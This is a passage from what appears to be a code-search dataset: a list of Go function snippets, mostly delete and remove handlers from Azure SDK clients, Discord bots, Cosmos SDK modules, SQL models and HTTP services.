rBody.Channel,\n\t\tPayload: bytes,\n\t}\n\n\tbroker.Hub.Publish(pubMessage)\n\n\tw.WriteHeader(http.StatusOK)\n\treturn\n\n}", "func MessageBotReactionRemove(s *discordgo.Session, m *discordgo.Message, emojis ...string) {\n\tfor _, emoji := range emojis {\n\t\ts.MessageReactionRemove(m.ChannelID, m.ID, emoji, s.State.Ready.User.ID)\n\t}\n}", "func handleMsgDeleteAllowance(ctx sdk.Context, k keeper.Keeper, msg types.MsgDeleteAllowance) (*sdk.Result, error) {\n\tif !k.AllowanceExists(ctx, msg.ID) {\n\t\t// replace with ErrKeyNotFound for 0.39+\n\t\treturn nil, sdkerrors.Wrap(sdkerrors.ErrInvalidRequest, msg.ID)\n\t}\n\tif !msg.Creator.Equals(k.GetAllowanceOwner(ctx, msg.ID)) {\n\t\treturn nil, sdkerrors.Wrap(sdkerrors.ErrUnauthorized, \"Incorrect Owner\")\n\t}\n\n\tk.DeleteAllowance(ctx, msg.ID)\n\treturn &sdk.Result{}, nil\n}", "func (client MeshNetworkClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client PatternClient) DeletePatternResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (f5 *BigIP) handleDelete(msg comm.Message) comm.Message {\n\tswitch f5.UpdateMode {\n\tcase vsUpdateMode:\n\t\tm := f5.handleVSDelete(msg)\n\t\treturn m\n\tcase policyUpdateMode:\n\t\tm := f5.handleGlobalPolicyDelete(msg)\n\t\treturn m\n\tdefault:\n\t\tmsg.Error = fmt.Sprintf(\"unsupported updateMode %v\", f5.UpdateMode)\n\t\treturn msg\n\t}\n}", "func (s *Service) HandleDelete(w http.ResponseWriter, r *http.Request) {\n\terr := s.subscriptionRepository.Delete(r.Context(), s.getResourceID(r), s.getSubscriptionID(r))\n\tif err != nil {\n\t\tstatus := http.StatusInternalServerError\n\t\tif errRepo, ok := err.(flare.SubscriptionRepositoryError); ok && errRepo.NotFound() {\n\t\t\tstatus = http.StatusNotFound\n\t\t}\n\n\t\ts.writer.Error(w, \"error during subscription delete\", err, status)\n\t\treturn\n\t}\n\n\ts.writer.Response(w, nil, http.StatusNoContent, nil)\n}", "func (client PublishedBlueprintsClient) DeleteResponder(resp *http.Response) (result PublishedBlueprint, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func handleMessage(m *sqs.Message, h Handler) error {\n var err error\n err = h.HandleMessage(m)\n if err != nil {\n return err\n }\n\n _, err = SqsService.Delete(m.ReceiptHandle)\n if err != nil {\n return err\n }\n\n log.Printf(\"Deleted message from queue: %s\\n\", aws.StringValue(m.ReceiptHandle))\n return nil\n}", "func (client ModelClient) DeleteRegexEntityRoleResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (client ModelClient) DeleteIntentResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (c *Client) Delete() error {\n\treturn c.sendJSONToChannel(struct {\n\t\tID int `json:\"id\"`\n\t\tAction string `json:\"action\"`\n\t}{c.nextEventID(), \"delete\"})\n}", "func DeleteCommentReaction(doerID, issueID, commentID int64, content string) error {\n\treturn DeleteReaction(db.DefaultContext, &ReactionOptions{\n\t\tType: content,\n\t\tDoerID: doerID,\n\t\tIssueID: issueID,\n\t\tCommentID: commentID,\n\t})\n}", "func (r *AlertsConfigReconciler) HandleDelete(ctx context.Context, alertsConfig *alertmanagerv1alpha1.AlertsConfig) error {\n\tlog := log.Logger(ctx, \"controllers\", \"alertsconfig_controller\", \"HandleDelete\")\n\tlog = log.WithValues(\"alertsConfig_cr\", alertsConfig.Name, \"namespace\", alertsConfig.Namespace)\n\t// Lets check the status of the CR and\n\t// retrieve all the alerts associated with this CR and delete it\n\t//Check if any alerts were created with this config\n\tif len(alertsConfig.Status.AlertsStatus) > 0 {\n\t\t//Call wavefront api and delete the alerts one by one\n\t\tfor _, alert := range alertsConfig.Status.AlertsStatus {\n\t\t\tif err := r.DeleteIndividualAlert(ctx, alertsConfig.Name, alert, alertsConfig.Namespace); err != nil {\n\t\t\t\tlog.Error(err, \"skipping alert deletion\", \"alertID\", alert.ID)\n\t\t\t\t// Just skip it for now\n\t\t\t\t// this is too opinionated but we don't want to stop the delete execution for other alerts as well\n\t\t\t\t// if there is any valid reasons not to skip it, we can look into it in future\n\t\t\t}\n\t\t}\n\t}\n\n\t// Ok. Lets delete the finalizer so controller can delete the custom object\n\tlog.Info(\"Removing finalizer from WavefrontAlert\")\n\talertsConfig.ObjectMeta.Finalizers = utils.RemoveString(alertsConfig.ObjectMeta.Finalizers, alertsConfigFinalizerName)\n\tr.CommonClient.UpdateMeta(ctx, alertsConfig)\n\tlog.Info(\"Successfully deleted wfAlert\")\n\tr.Recorder.Event(alertsConfig, v1.EventTypeNormal, \"Deleted\", \"Successfully deleted WavefrontAlert\")\n\treturn nil\n}", "func sendMsgRemovePostReaction(\n\tr *rand.Rand, app *baseapp.BaseApp, ak authkeeper.AccountKeeper, bk bankkeeper.Keeper,\n\tmsg *types.MsgRemovePostReaction, ctx sdk.Context, chainID string, privkeys []cryptotypes.PrivKey,\n) error {\n\taddr, _ := sdk.AccAddressFromBech32(msg.User)\n\taccount := ak.GetAccount(ctx, addr)\n\tcoins := bk.SpendableCoins(ctx, account.GetAddress())\n\n\tfees, err := simtypes.RandomFees(r, ctx, coins)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ttxGen := simappparams.MakeTestEncodingConfig().TxConfig\n\ttx, err := helpers.GenTx(\n\t\ttxGen,\n\t\t[]sdk.Msg{msg},\n\t\tfees,\n\t\tDefaultGasValue,\n\t\tchainID,\n\t\t[]uint64{account.GetAccountNumber()},\n\t\t[]uint64{account.GetSequence()},\n\t\tprivkeys...,\n\t)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, _, err = app.Deliver(txGen.TxEncoder(), tx)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (client DataFlowClient) DeleteDataFlowResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client ModelClient) DeleteRegexEntityModelResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (client ModelClient) DeleteClosedListResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (inms *IndividualMessageHandler) DeleteMessage(response http.ResponseWriter, request *http.Request) {\n\tresponse.Header().Set(\"Content-Type\", \"application/json; charset\")\n\tmessageNo := request.FormValue(\"message_no\")\n\talieid := request.FormValue(\"friend_id\")\n\tsession := inms.Session.GetSession(request)\n\tresponse.Header().Set(\"Content-Type\", \"application/json\")\n\tres := &struct {\n\t\tSuccess bool `json:\"success\"`\n\t\tMessage string `json:\"message\"`\n\t\tFriendID string `json:\"friend_id\"`\n\t\tMessageNo int `json:\"message_no\"`\n\t}{\n\t\tSuccess: false,\n\t}\n\tif session == nil {\n\t\tresponse.Write([]byte(\" UnAuthorized User \"))\n\t\treturn\n\t}\n\tmessageNumber, er := strconv.Atoi(messageNo)\n\tres.MessageNo = messageNumber\n\tres.FriendID = alieid\n\tif er != nil || messageNumber <= 0 || alieid == \"\" {\n\t\tres.Message = \"Invalid Input please Try Again \"\n\t\tresponse.Write(Helper.MarshalThis(res))\n\t\treturn\n\t}\n\talies := inms.AlieSer.GetAlies(alieid, session.UserID)\n\tif alies == nil {\n\t\tres.Message = \" No Message Found \"\n\t\tresponse.Write(Helper.MarshalThis(res))\n\t\treturn\n\t}\n\talies.Messages = func() []*entity.Message {\n\t\tvar messages = []*entity.Message{}\n\t\tfor _, mess := range alies.Messages {\n\t\t\tif mess.MessageNumber != messageNumber {\n\t\t\t\tmessages = append(messages, mess)\n\t\t\t}\n\t\t}\n\t\treturn messages\n\t}()\n\n\talies = inms.AlieSer.UpdateAlies(alies)\n\n\tif alies != nil {\n\t\tres.Success = true\n\t\tres.Message = \"Succesfuly Deleted Message Number \" + strconv.Itoa(messageNumber)\n\t\tresponse.Write(Helper.MarshalThis(res))\n\t\treturn\n\t}\n\tres.Success = false\n\tres.Message = \" Internal Server ERROR \"\n\tresponse.WriteHeader(http.StatusInternalServerError)\n\tresponse.Write(Helper.MarshalThis(res))\n}", "func (client IotHubResourceClient) DeleteResponder(resp *http.Response) (result SetObject, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent, http.StatusNotFound),\n\t\tautorest.ByUnmarshallingJSON(&result.Value),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (c *ChannelMessage) DeleteReplies() error {\n\tmr := NewMessageReply()\n\tmr.MessageId = c.Id\n\n\t// list returns ChannelMessage\n\tmessageReplies, err := mr.ListAll()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// delete message replies\n\tfor _, replyMessage := range messageReplies {\n\t\terr := replyMessage.DeleteMessageAndDependencies(false)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (client ThreatIntelligenceIndicatorClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func ReactionAddHandler(s *discordgo.Session, r *discordgo.MessageReactionAdd) {\n\t// Check author for bot\n\tu, err := s.User(r.UserID)\n\tif err != nil {\n\t\tlogger.Log.Error(err.Error())\n\t\treturn\n\t}\n\tif u.Bot {\n\t\treturn\n\t}\n\n\t// Get Server object\n\tc, err := s.Channel(r.ChannelID)\n\tif err != nil {\n\t\tlogger.Log.Error(err.Error())\n\t\treturn\n\t}\n\tserver, err := db.GetServer(c.GuildID)\n\tif err != nil {\n\t\tlogger.Log.Error(err.Error())\n\t\treturn\n\t}\n\n\t// Call reaction command\n\tfor _, cmd := range command.ReactionCommands {\n\t\tif cmd.Trigger() == r.Emoji.ID {\n\t\t\tcmd.Execute(server, s, r)\n\t\t\treturn\n\t\t}\n\t}\n}", "func DeleteMessage() {\n\n}", "func (shareXRouter *ShareXRouter) handleDelete(writer http.ResponseWriter, request *http.Request) {\n\t//get the delete reference\n\tdeleteReference, ok := mux.Vars(request)[deleteReferenceVar]\n\tif !ok {\n\t\thttp.Error(writer, \"400 Bad request\", http.StatusBadRequest)\n\t\treturn\n\t}\n\t//delete the entry\n\terr := shareXRouter.Storage.Delete(deleteReference)\n\tif err != nil {\n\t\tshareXRouter.sendInternalError(writer, fmt.Sprintf(\"deleting entry with call reference %v\", strconv.Quote(deleteReference)), err)\n\t\treturn\n\t}\n\twriter.WriteHeader(http.StatusOK)\n}", "func (client ModelClient) DeleteClosedListEntityRoleResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (client PatternClient) DeletePatternsResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (client Client) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNotFound),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client FeatureStateClient) DeleteStateResponder(resp *http.Response) (result autorest.Response, err error) {\n err = autorest.Respond(\n resp,\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusNoContent),\n autorest.ByClosing())\n result.Response = resp\n return\n }", "func (dtm *DirectToMessage) Delete(db XODB) error {\n\tvar err error\n\n\t// if doesn't exist, bail\n\tif !dtm._exists {\n\t\treturn nil\n\t}\n\n\t// if deleted, bail\n\tif dtm._deleted {\n\t\treturn nil\n\t}\n\n\t// sql query\n\tconst sqlstr = `DELETE FROM ms.direct_to_message WHERE Id = ?`\n\n\t// run query\n\tXOLog(sqlstr, dtm.Id)\n\t_, err = db.Exec(sqlstr, dtm.Id)\n\tif err != nil {\n\t\tXOLogErr(err)\n\t\treturn err\n\t}\n\n\t// set deleted\n\tdtm._deleted = true\n\n\tOnDirectToMessage_AfterDelete(dtm)\n\n\treturn nil\n}", "func SimulateMsgRemovePostReaction(\n\tk keeper.Keeper, ak authkeeper.AccountKeeper, bk bankkeeper.Keeper,\n) simtypes.Operation {\n\treturn func(\n\t\tr *rand.Rand, app *baseapp.BaseApp, ctx sdk.Context,\n\t\taccs []simtypes.Account, chainID string,\n\t) (simtypes.OperationMsg, []simtypes.FutureOperation, error) {\n\n\t\tdata, skip := randomRemovePostReactionFields(r, ctx, accs, k, ak)\n\t\tif skip {\n\t\t\treturn simtypes.NoOpMsg(types.RouterKey, types.ModuleName, \"MsgRemovePostReaction\"), nil, nil\n\t\t}\n\n\t\tmsg := types.NewMsgRemovePostReaction(data.PostID, data.User.Address.String(), data.Shortcode)\n\t\terr := sendMsgRemovePostReaction(r, app, ak, bk, msg, ctx, chainID, []cryptotypes.PrivKey{data.User.PrivKey})\n\t\tif err != nil {\n\t\t\treturn simtypes.NoOpMsg(types.RouterKey, types.ModuleName, \"MsgRemovePostReaction\"), nil, err\n\t\t}\n\n\t\treturn simtypes.NewOperationMsg(msg, true, \"MsgRemovePostReaction\"), nil, nil\n\t}\n}", "func Deleted(c *routing.Context, msg string, service string) error {\n\tResponse(c, `{\"error\": false, \"msg\": \"`+msg+`\"}`, 200, service, \"application/json\")\n\treturn nil\n}", "func handleDelete(w http.ResponseWriter, r *http.Request) (err error) {\n\n\t// 베이스 경로 문자에서 숫자로\n\tid, err := strconv.Atoi(path.Base(r.URL.Path))\n\tif err != nil {\n\t\treturn\n\t}\n\n\t// 일단 가져오기\n\tpost, err := retrieve(id)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t// 이걸 구지 post 에서 해야하나? 음..\n\terr = post.delete()\n\tif err != nil {\n\t\treturn\n\t}\n\n\t// 완료 때리기\n\tw.WriteHeader(200)\n\treturn\n}", "func (client AccountClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n err = autorest.Respond(\n resp,\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusAccepted,http.StatusNoContent),\n autorest.ByClosing())\n result.Response = resp\n return\n }", "func (client AppsClient) DeleteResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (client ModelClient) DeleteCustomEntityRoleResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func DeleteMessage(clientId string, mid uint16, direction MessageDirection) error {\n\tmeta := broker.GetService(ServiceName).(*MetadataService)\n\treturn meta.deleteMessage(clientId, mid, direction)\n}", "func (client MSIXPackagesClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (s *GoJobServer) handleDelete(conn net.Conn, cmdReader *bufio.Reader) {\n\t// DELETE<\\0><id>\n\tjobID, err := data.ParseUint64(cmdReader)\n\tif err != nil {\n\t\terrorResponse(conn, \"Malformed DELETE command: failed to parse job ID\")\n\t\treturn\n\t}\n\n\terr = s.queue.DeleteJob(jobID)\n\tif err != nil {\n\t\terrorResponse(conn, fmt.Sprintf(\"Job %v already deleted\", jobID))\n\t\treturn\n\t}\n\n\tconn.Write(data.PackString(\"OK\"))\n}", "func (client OpenShiftManagedClustersClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func DeleteTrigger(w http.ResponseWriter, r *http.Request) {\n\tlog.Println(\"Received a DELETE. Working. \")\n}", "func (s *API) DeleteMessage(w http.ResponseWriter, req *http.Request) {\n\tlog.Debug(\"DeleteMessage\")\n\tw.WriteHeader(http.StatusNotImplemented)\n}", "func (p *metadataService) deleteMessage(clientID string, pid uint16, direction uint8) {\n\tp.deleteMessageWithValidator(clientID, func(msg *base.Message) bool {\n\t\treturn msg.PacketId == pid && msg.Direction == direction\n\t})\n}", "func (c *Client) Delete(ID int) error {\n\terr := c.writeMsg(fmt.Sprintf(\"DELE %v\\r\\n\", ID))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tmsg, err := c.readMsg(singleLineMessageTerminator)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif c.isError(msg) {\n\t\treturn fmt.Errorf(\"Unknown error returned %v\", msg)\n\t}\n\n\tfmt.Printf(\"Deleting message %d\\n\", ID)\n\n\treturn nil\n}", "func (client ViewsClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client IngestionSettingsClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client ServicesClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (h *Handler) DeleteHandler(w http.ResponseWriter, r *http.Request) {\n\tid := chi.URLParam(r, \"id\")\n\n\tctx, cancel := context.WithCancel(r.Context())\n\tdefer cancel()\n\n\tvar err error\n\n\trole, err := auth.GetRole(r)\n\tif err != nil {\n\t\t_ = response.HTTPError(w, http.StatusBadRequest, response.ErrorBadRequest.Error())\n\t\treturn\n\t}\n\n\tselect {\n\tcase <-ctx.Done():\n\t\t_ = response.HTTPError(w, http.StatusBadGateway, response.ErrTimeout.Error())\n\t\treturn\n\tdefault:\n\t\terr = h.service.Delete(ctx, role, id)\n\t}\n\tif err != nil {\n\t\th.log.Error(err)\n\t\t_ = response.HTTPError(w, http.StatusNotFound, err.Error())\n\t\treturn\n\t}\n\n\trender.JSON(w, r, render.M{})\n}", "func (client JobClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n err = autorest.Respond(\n resp,\n azure.WithErrorUnlessStatusCode(http.StatusOK,http.StatusAccepted,http.StatusNoContent),\n autorest.ByClosing())\n result.Response = resp\n return\n }", "func (_m *SlackClient) RemoveReaction(name string, item slack.ItemRef) {\n\t_m.Called(name, item)\n}", "func (client Client) DeleteResponder(resp *http.Response) (result VolumeInstancesDeleteResponse, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func (h *Handler) Delete(w http.ResponseWriter, r *http.Request) {\n\n\tp := mux.Vars(r)\n\tid := p[\"id\"]\n\n\terr := h.Source.Delete(id)\n\n\tif err != nil {\n\t\te := Error{\n\t\t\tMessage: fmt.Sprintf(\"An error occured when trying to delete the delivery : %s\", err),\n\t\t}\n\t\tJSONWithHTTPCode(w, e, 500)\n\t\treturn\n\t}\n\n\tJSONWithHTTPCode(w, nil, 204)\n\n}", "func DeleteMessage(m *tb.Message, b *tb.Bot, timeout time.Duration) {\n\ttime.Sleep(timeout)\n\terr := b.Delete(m)\n\tif err != nil {\n\t\tlogrus.Info(err)\n\t}\n\tlogrus.Info(\"Remove message \", m.ID)\n}", "func (m *Message) Delete(d ...*time.Duration) {\n\tif len(d) > 0 && d[0] != nil {\n\t\ttime.Sleep(*d[0])\n\t}\n\terr := m.Session.ChannelMessageDelete(m.Message.ChannelID, m.Message.ID)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n}", "func (o *DMessageEmbed) Delete(exec boil.Executor) error {\n\tif o == nil {\n\t\treturn errors.New(\"models: no DMessageEmbed provided for delete\")\n\t}\n\n\targs := queries.ValuesFromMapping(reflect.Indirect(reflect.ValueOf(o)), dMessageEmbedPrimaryKeyMapping)\n\tsql := \"DELETE FROM \\\"d_message_embeds\\\" WHERE \\\"id\\\"=$1\"\n\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, sql)\n\t\tfmt.Fprintln(boil.DebugWriter, args...)\n\t}\n\n\t_, err := exec.Exec(sql, args...)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"models: unable to delete from d_message_embeds\")\n\t}\n\n\treturn nil\n}", "func (client CloudEndpointsClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (c *Cache) HandleDelete(ctx *fasthttp.RequestCtx) {\n\tc.Remove(ctx.UserValue(\"key\").(string))\n}", "func (client DeviceClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent, http.StatusBadRequest, http.StatusUnauthorized, http.StatusForbidden, http.StatusNotFound, http.StatusInternalServerError),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (client DatabasesClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func (c *ChannelMessage) DeleteMessageAndDependencies(deleteReplies bool) error {\n\t// fetch interactions\n\ti := NewInteraction()\n\ti.MessageId = c.Id\n\tinteractions, err := i.FetchAll(\"like\")\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// delete interactions\n\tfor _, interaction := range interactions {\n\t\terr := interaction.Delete()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\tif deleteReplies {\n\t\tif err := c.DeleteReplies(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// delete any associated channel message lists\n\tif err = c.DeleteChannelMessageLists(); err != nil {\n\t\treturn err\n\t}\n\n\terr = NewMessageReply().DeleteByOrQuery(c.Id)\n\tif err != nil {\n\t\treturn err\n\t}\n\t// delete channel message itself\n\treturn c.Delete()\n}", "func (c *ConversationsRepo) Delete(conversation *models.Conversation) error {\n _, err := c.DB.Model(conversation).Where(\"id = ?\", conversation.ID).Delete()\n return err\n}", "func DeleteIssueReaction(doerID, issueID int64, content string) error {\n\treturn DeleteReaction(db.DefaultContext, &ReactionOptions{\n\t\tType: content,\n\t\tDoerID: doerID,\n\t\tIssueID: issueID,\n\t\tCommentID: -1,\n\t})\n}", "func Delete(c messagebird.Client, id string) error {\n\treturn c.Request(nil, http.MethodDelete, path+\"/\"+id, nil)\n}", "func (client FirewallPolicyRuleGroupsClient) DeleteResponder(resp *http.Response) (result autorest.Response, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK, http.StatusAccepted, http.StatusNoContent),\n\t\tautorest.ByClosing())\n\tresult.Response = resp\n\treturn\n}", "func handleDelete(ctx *verifierContext, status *types.VerifyImageStatus) {\n\n\tlog.Functionf(\"handleDelete(%s) refcount %d\",\n\t\tstatus.ImageSha256, status.RefCount)\n\n\tif _, err := os.Stat(status.FileLocation); err == nil {\n\t\tlog.Functionf(\"handleDelete removing %s\",\n\t\t\tstatus.FileLocation)\n\t\tif err := os.RemoveAll(status.FileLocation); err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t} else {\n\t\tlog.Warnf(\"handleDelete: Unable to delete %s: %s\",\n\t\t\tstatus.FileLocation, err)\n\t}\n\n\tunpublishVerifyImageStatus(ctx, status)\n\tlog.Functionf(\"handleDelete done for %s\", status.ImageSha256)\n}", "func (c *Controller) onDelete(obj interface{}) {\n\tfmt.Println(\"onDelete called\")\n\tc.dequeue(obj)\n}", "func (m *Message) Delete() error {\n\treturn globalMessage.Delete(m.ID)\n}", "func (client ModelClient) DeleteHierarchicalEntityRoleResponder(resp *http.Response) (result OperationStatus, err error) {\n\terr = autorest.Respond(\n\t\tresp,\n\t\tclient.ByInspecting(),\n\t\tazure.WithErrorUnlessStatusCode(http.StatusOK),\n\t\tautorest.ByUnmarshallingJSON(&result),\n\t\tautorest.ByClosing())\n\tresult.Response = autorest.Response{Response: resp}\n\treturn\n}", "func PolicyDeleteMessage(deleted int, labels []string, revision uint64) AgentNotifyMessage {\n\tnotification := PolicyUpdateNotification{\n\t\tLabels: labels,\n\t\tRevision: revision,\n\t\tRuleCount: deleted,\n\t}\n\n\treturn AgentNotifyMessage{\n\t\tType: AgentNotifyPolicyDeleted,\n\t\tNotification: notification,\n\t}\n}", "func (s *StanServer) handleChannelDelete(c *channel) {\n\tdelete := false\n\tcs := s.channels\n\tcs.Lock()\n\ta := c.activity\n\tif a.preventDelete || a.deleteInProgress || c.ss.hasActiveSubs() {\n\t\tif s.debug {\n\t\t\ts.log.Debugf(\"Channel %q cannot be deleted: preventDelete=%v inProgress=%v hasActiveSubs=%v\",\n\t\t\t\tc.name, a.preventDelete, a.deleteInProgress, c.ss.hasActiveSubs())\n\t\t}\n\t\tc.stopDeleteTimer()\n\t} else {\n\t\telapsed := time.Since(a.last)\n\t\tif elapsed >= a.maxInactivity {\n\t\t\tif s.debug {\n\t\t\t\ts.log.Debugf(\"Channel %q is being deleted\", c.name)\n\t\t\t}\n\t\t\tc.stopDeleteTimer()\n\t\t\t// Leave in map for now, but mark as deleted. If we removed before\n\t\t\t// completion of the removal, a new lookup could re-create while\n\t\t\t// in the process of deleting it.\n\t\t\ta.deleteInProgress = true\n\t\t\tdelete = true\n\t\t} else {\n\t\t\tvar next time.Duration\n\t\t\tif elapsed < 0 {\n\t\t\t\tnext = a.maxInactivity\n\t\t\t} else {\n\t\t\t\t// elapsed < a.maxInactivity\n\t\t\t\tnext = a.maxInactivity - elapsed\n\t\t\t}\n\t\t\tif s.debug {\n\t\t\t\ts.log.Debugf(\"Channel %q cannot be deleted now, reset timer to fire in 